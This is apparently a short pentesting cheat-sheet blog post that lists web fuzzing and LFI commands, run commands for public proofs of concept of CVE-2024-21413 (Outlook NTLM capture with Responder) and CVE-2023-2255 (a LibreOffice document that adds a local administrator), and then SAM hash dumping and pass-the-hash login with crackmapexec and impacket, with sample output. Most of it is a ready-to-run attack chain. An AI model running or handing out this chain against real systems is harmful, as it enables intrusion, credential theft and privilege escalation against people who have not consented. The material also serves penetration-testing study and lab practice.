Common web fuzzing cmd

• general path search

> dirsearch -u http://target -x 403,404

• find available parameters

> wfuzz -w /usr/share/wordlists/dirb/common.txt -u "http://target/file.php?FUZZ=test"

• testing for possible LFI, a handy lightweight wordlist to use: https://github.com/Karanxa/Bug-Bounty-Wordlists

> wfuzz -w /usr/share/wordlists/Bug-Bounty-Wordlists/windows-lfi.txt -u "http://target/file.php?file=../../../FUZZ"

CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability PoC

• https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability?tab=readme-ov-file

This script requires SMTP authentication to send an email, bypassing SPF, DKIM, and DMARC checks, which helps in simulating a real-world attack scenario more effectively.

> python3 CVE-2024-21413.py --server target --port 587 --username user@target --password passwd --sender user@domain --recipient victim@target --url '\\kali' --subject XD

> responder -I <eth>

CVE-2023-2255

Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used “floating frames” linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.

• https://github.com/elweth-sec/CVE-2023-2255

# on kali
python3 CVE-2023-2255.py --cmd 'net localgroup Administrator user /add' --output 'test.odt'

# target
wget http://kali/test.odt -O "c:\path\test.odt"

• once the user is added to admin group, dump the hash and access as admin

> crackmapexec smb target -u user -p pass --sam
[*] Initializing FTP protocol database
SMB         target     445    target          [*] Windows 10.0 Build 19041 x64 (name:target) (domain:target) (signing:False) (SMBv1:False)
SMB         target     445    target          [+] target\user:pass (Pwn3d!)
SMB         target     445    target          [+] Dumping SAM hashes
SMB         target     445    target          admin1:500:aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf:::
SMB         target     445    target          admin2:501:aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf:::
SMB         target     445    target          [+] Added 6 SAM hashes to the database

> impacket-wmiexec admin1@target -hashes "aad3b435b51404eeaad3b435b51404ee:asdfasdfasdfasdfasdfasdfasdfasdf"

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack